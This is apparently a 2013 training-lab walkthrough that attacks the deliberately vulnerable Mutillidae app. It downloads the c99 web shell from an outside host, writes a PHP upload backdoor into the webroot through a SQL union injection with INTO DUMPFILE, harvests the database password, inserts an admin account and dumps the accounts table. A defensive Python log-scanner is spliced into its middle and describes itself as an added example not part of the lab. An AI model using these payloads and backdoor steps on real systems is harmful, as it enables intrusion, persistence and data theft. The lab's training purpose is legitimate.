
OWASP Top 10 Web Hacking Final Lab 11 - SQL Injection Union Exploit #4 (Create PHP Upload Script)

Written By Akademy on Thursday, November 21, 2013 | 9:10 PM

Section 7. Download c99.php

  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
    • Note(FYI):
      1. You can re-use your previous console terminal from (Section 6, Step 1).
  2. Download c99.rar
    • Instructions:
      1. mkdir -p /root/backdoor
      2. cd /root/backdoor/
      3. wget http://r57.gen.tr/shell/c99.rar
      4. ls -l c99.rar
  3. Uncompress c99.rar
    • Note(FYI):
      • A rar file is a compressed archive format that is seen more often in the Windows environment than in Linux.
      • We will also edit the c99.php file with the sed utility.
    • Instructions:
      1. unrar x c99.rar
        • Extract c99.php
      2. cp c99.php c99.php.bkp
      3. head -1 c99.php
        • Notice how the first line does NOT contain "<?php".
      4. sed -i '1 s/^.*$/<?php/g' c99.php
        • This only replaces the first line of file with "<?php".
      5. head -1 c99.php
        • Notice how the first line DOES contain "<?php".
      6. ls -l

Section 8. Database Union Explanation
  1. On Fedora 14 - Mutillidae
    • Notes (FYI):
      • Use your existing Terminal you opened in (Section 3, Step 1).
    • Instructions:
      1. su - root
      2. mysql -uroot -psamurai
      3. show databases;
      4. use nowasp;
  2. Show Tables
    • Instructions:
      1. show tables;
    • Notes (FYI):
      1. show tables lists all the tables in the currently selected database.
  3. Describe the accounts Table
    • Instructions:
      1. desc accounts;
    • Notes (FYI):
      1. desc accounts shows the fields of the accounts table.
      2. The Mutillidae User Info Application uses this table.
      3. Notice it has 5 fields.
      4. In order to complete a successful SQL union injection, the injected select must also supply 5 fields.
      5. E.g., ' union select null,null,null,null,null -- 

Section 9. Navigate to the User Info Page
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If the Firefox icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae
  3. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

Section 10. Inject Upload Form into User Info Page
  1. Inspect the View Account Details Button with Firebug
    • Instructions:
      1. Right click on the View Accounts Details Button
      2. Click on Inspect Element
  2. Change Button Placement
    • Instructions:
      1. After the string style="text-align:, Change center to left. (See Picture)
      2. Click on the Close Button
    • Note(FYI):
      1. You are changing the button position so that the button stays visible after you change the size of the Name Textbox in the following step.
  3. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  4. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 550. (See Picture)
      2. Click on the Close Button
  5. Backdoor SQL Union Injection
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select null,null,null,null,'<html><body><div><?php if(isset($_FILES["fupload"])) { $source = $_FILES["fupload"]["tmp_name"]; $target = $_FILES["fupload"]["name"]; move_uploaded_file($source,$target); system("chmod 770 $target"); $size = getImageSize($target); } ?></div><form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"]?>" method="post"><p><input type="hidden" name="MAX_FILE_SIZE" value="500000"><input type="file" name="fupload"><br><input type="submit" name="upload!"><br></form></body></html>' INTO DUMPFILE '/var/www/html/mutillidae/upload_file.php' --
      2. Click the View Account Details button
    • Note(FYI):
      1. The above SQL union statement writes a small PHP script to the following location: /var/www/html/mutillidae/upload_file.php.
      2. ' union select null,null,null,null,' - This is the start of the SQL union injection statement; it supplies the first four fields, followed by the opening quote of the fifth field (,').
      3. <html><body><div> - This is the standard opening of an HTML page.
      4. <?php if(isset($_FILES["fupload"])) { $source = $_FILES["fupload"]["tmp_name"]; $target = $_FILES["fupload"]["name"]; move_uploaded_file($source,$target); system("chmod 770 $target"); $size = getImageSize($target); } ?> - This is the PHP script that saves an uploaded file into the web directory. The HTML form that follows it allows a person to upload a file of up to 500,000 bytes (value="500000"). The browse button is represented as (<input type="file" name="fupload">). The submit button is represented as (<input type="submit" name="upload!">).
      5. ' INTO DUMPFILE ' - This tells MySQL to place the HTML Form / PHP Script into a file.
      6. /var/www/html/mutillidae/upload_file.php - This is the output file.
  6. Viewing the Results
    • Note(FYI):
      1. This is a typical error message saying either a bad user name or password was supplied.
      2. Typically, web designers should not display what caused an error.
      3. Highlighted by the red rectangle, notice that the upload form is now embedded in the query results.
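From the defender's side, the injection above leaves a distinctive trace in the web server's access log: a query parameter containing UNION ... SELECT, INTO DUMPFILE and a trailing comment. The following Python script is an added example (not part of the lab) that scans constructed Apache access-log lines for that pattern, URL-decoding each parameter and reporting the file the injection tried to write; the log lines, their format and all function names are my own assumptions.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed Apache access-log lines (assumed format; not taken from the lab). The second
# request carries the lab's union payload, HTML body shortened, URL-encoded as a browser sends it.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2013:21:10:01 -0500] "GET /mutillidae/index.php?page=user-info.php&username=john&password=x HTTP/1.1" 200 5120
10.0.0.5 - - [21/Nov/2013:21:12:44 -0500] "GET /mutillidae/index.php?page=user-info.php&username=%27+union+select+null%2Cnull%2Cnull%2Cnull%2C%27%3Chtml%3Eupload+form%3C%2Fhtml%3E%27+INTO+DUMPFILE+%27%2Fvar%2Fwww%2Fhtml%2Fmutillidae%2Fupload_file.php%27+--+&password= HTTP/1.1" 200 6211
10.0.0.5 - - [21/Nov/2013:21:13:02 -0500] "GET /mutillidae/upload_file.php HTTP/1.1" 200 833
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
UNION_RE = re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.I)
FILEWRITE_RE = re.compile(r"\binto\s+(dumpfile|outfile)\s+'([^']*)'", re.I)
COMMENT_RE = re.compile(r"(--(?:\s|$)|#|/\*)")

def inspect_value(value: str) -> Optional[dict]:
    """Return indicator details for one parameter value, or None if nothing suspicious."""
    # Decode once more (catches double-encoded payloads) and collapse whitespace.
    text = " ".join(unquote_plus(value).split())
    union = UNION_RE.search(text)
    filewrite = FILEWRITE_RE.search(text)
    if not (union or filewrite):
        return None
    return {
        "union": bool(union),
        "file_write": filewrite.group(1).upper() if filewrite else None,
        "target": filewrite.group(2) if filewrite else None,      # file the injection writes
        "comment_terminator": bool(COMMENT_RE.search(text)),      # the trailing "-- "
    }

def scan_log(log_text: str) -> List[dict]:
    """Flag every query parameter in the log that carries a union / file-write injection."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlparse(target)
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for v in values:
                hit = inspect_value(v)
                if hit:
                    findings.append({"client": client, "path": url.path, "param": param,
                                     "status": int(status), **hit})
    return findings
```

Writes like this succeed only because the lab application connects as MySQL root, which holds the FILE privilege, and secure_file_priv does not restrict the output directory; revoking FILE from the web application's database account and setting secure_file_priv closes the write path even where the injection itself remains.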

Section 11. Upload c99.php to Mutillidae
  1. Upload c99.php to Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/upload_file.php
      2. Click the Browse Button
      3. Navigate to /root/backdoor
      4. Click on c99.php
      5. Click the Open Button
      6. Click the Submit Query Button

Section 12. Using c99.php to grab the database password
  1. Server security information
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae/c99.php, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the address bar
        • http://192.168.1.111/mutillidae/c99.php
      2. Click on the Sec. link
  2. Discover Mutillidae Application Directory
    • Instructions:
      1. Place "pwd" in the upper-left command execute text box. (See Picture).
      2. Click Execute
    • Note(FYI):
      1. pwd - print name of current/working directory.
  3. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" and "=".
    • Instructions:
      1. Notice that /var/www/html/mutillidae is displayed in the results section.  This is the Mutillidae Application directory.  In the following step, we will use find to search the /var/www/html/mutillidae directory for php scripts that contain a password.
      2. Place the following command in the second pane:
        • find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
      3. Click Execute button
  4. Viewing Password Results
    • Notes (FYI):
      1. Notice the password is "samurai".
      2. Notice that the script containing the samurai password is located at:
        •  /var/www/html/mutillidae/classes/MySQLHandler.php
  5. Viewing the Code
    • Notes (FYI):
      • It is possible to display the contents of the MySQLHandler.php program by encoding the "<?php" and "?>" tags.  These tags tell Apache to execute the file as a PHP script.  To get around this and just display the text of the program, we change "<" to "&#60;" and ">" to "&#62;".
    • Instructions:
      1. Place the following command in the second pane:
        • find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
      2. Click the Execute Button
      3. Database Username
        • static public $mMySQLDatabaseUsername = "root";
      4. Database Password
        • static public $mMySQLDatabasePassword = "samurai";
      5. Database Name
        • static public $mMySQLDatabaseName = "nowasp";

Section 13. Using c99.php to pillage the database
  1. Connect to SQL
    • Instructions:
      1. Click the SQL navigation link.
      2. Username: root
      3. Password: samurai
      4. Database: nowasp
      5. Click the Connect Button
  2. Select the "accounts" table
    • Instructions:
      1. Click on accounts
  3. Insert Record Link
    • Instructions:
      1. Click the [ Insert ] Link
  4. Supply New User Information
    • Instructions:
      1. cid Value: 20
      2. username Value: hacker
      3. password Value: hacker
      4. mysignature: Your Name
        • Note: Replace the string "Your Name" with your actual name. 
        • E.g., John Gray
      5. is_admin: TRUE
      6. Click the Confirm Button
  5. Insert New User Information
    • Instructions:
      1. Click the Yes Button
    • Note(FYI):
      1. This is the SQL syntax to insert a new user into the "accounts" table.
  6. Verify New User Information
    • Note(FYI):
      1. Scroll Down (See Picture)
      2. Verify that your hacker account was created
  7. Prepare to Dump the Accounts Table
    • Instructions:
      1. Scroll Up (See Picture)
      2. Click the Dump Link
  8. Dump the Accounts Table
    • Instructions:
      1. DB: nowasp
      2. Only tables (explode ";"): accounts
      3. File: ./dump_nowasp_accounts.sql
      4. Download Checkbox: Check it
      5. Save to file Checkbox: Check it
      6. Click the Dump Button
    • Note(FYI):
      1. You will be prompted to save the file, so please continue to next step for further directions.
  9. Save Accounts Dump File (Part 1)
    • Instructions:
      1. Click the Save File Radio Button
      2. Click the OK Button
  10. Save Accounts Dump File (Part 2)
    • Instructions:
      1. Name: dump_nowasp_accounts.sql
      2. Click the [+] in front of Browse for other folders
      3. Click the root folder
      4. Click the Save Button

Section 14. Proof of Lab
  1. Proof of Lab: Record the entire lab process and a text note containing your name.
Information Security Training Center Học Hacker Mũ Xám Online | Online Network Security Training | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved